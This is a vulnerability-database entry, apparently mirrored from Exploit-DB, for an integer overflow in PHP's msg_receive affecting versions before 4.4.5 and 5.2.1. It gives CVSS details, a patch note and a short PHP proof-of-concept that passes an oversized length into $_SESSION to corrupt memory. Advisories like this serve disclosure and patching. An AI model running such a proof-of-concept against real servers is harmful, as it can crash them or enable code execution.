header-logo
Suggest Exploit
vendor:
PHP
by:
Unknown
7.5
CVSS
HIGH
Integer-Overflow
190
CWE
Product Name: PHP
Affected Version From: PHP versions prior to 4.4.5 and 5.2.1
Affected Version To: Unknown
Patch Exists: YES
Related CWE: Unknown
CPE: a:php:php
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Integer-Overflow Vulnerability in PHP

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory. Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

Mitigation:

Update PHP to version 4.4.5 or 5.2.1 or later. Additionally, ensure that integer values are properly validated and handled to prevent integer-overflow vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23236/info

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.

Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

This issue affects PHP versions prior to 4.4.5 and 5.2.1. 

<?php

  $MSGKEY = 519052;

  $msg_id = msg_get_queue ($MSGKEY, 0600);

  if (!msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
    echo "Msg not sent because $msg_err\n";

  if (msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
    echo "$msg\n";
  } else {
    echo "Received $msg_error fetching message\n";
    break;
  }

  msg_remove_queue ($msg_id);

?>